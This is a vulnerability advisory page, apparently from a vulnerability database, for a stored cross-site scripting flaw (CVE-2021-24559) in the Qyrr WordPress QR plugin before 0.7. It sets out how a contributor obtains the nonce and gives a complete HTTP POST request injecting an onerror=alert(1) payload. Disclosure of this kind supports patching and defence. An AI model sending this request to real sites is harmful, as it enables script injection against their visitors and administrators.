Lucene search

K

Qyrr < 0.7 - Authenticated (contributor+) Stored XSS

🗓️ 26 Jul 2021 00:00:00Reported by dc11Type 
wpexploit
 wpexploit
👁 329 Views

Authenticating contributor account needed to exploit Stored XSS vulnerability in QR WordPress plugi

Show more
Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2021-24559
16 Jan 202416:15
cve
NVD
CVE-2021-24559
16 Jan 202416:15
nvd
WPVulnDB
Qyrr < 0.7 - Authenticated (contributor+) Stored XSS
26 Jul 202100:00
wpvulndb
Prion
Cross site scripting
16 Jan 202416:15
prion
Cvelist
CVE-2021-24559 Qyrr < 0.7 - Authenticated (contributor+) Stored XSS
16 Jan 202415:48
cvelist
To exploit this vulnerability the attacker should have access, at least, to an account with the capability 'edit_posts'. ( Eg. contributor ). This is required to obtain a nonce, which is used to protect the affected ajax function. 

To obtain the nonce, the attacker calls: "<your host here>/wp-admin/edit.php?post_type=qr". The nonce now lays in a script with the id "qyrr-admin-js-extra".

Inside the script, the exploitable qr-posts are listed (post_id is the id of post meta data with the meta key 'data-uri' ). There is no check, if the requesting user is the owner of that qr post.

The third required parameter is data-uri. This param will contain the stored javascript. On request-processing data-uri will be sanitized by sanitize_text_field but will not be escaped when output in the src attribute of the QR Code Image 


POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 94
Connection: close
Cookie: [contributor+]

action=data_uri_to_meta&nonce=d5c0a0e3fa&post_id=1238&data-uri=+%22+onerror%3Dalert(1)+e%3D%22


Then access the page/post where the QR Code is embed to trigger the XSS

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
26 Jul 2021 00:00Current
5.5Medium risk
Vulners AI Score5.5
EPSS0.001
329
.json
Report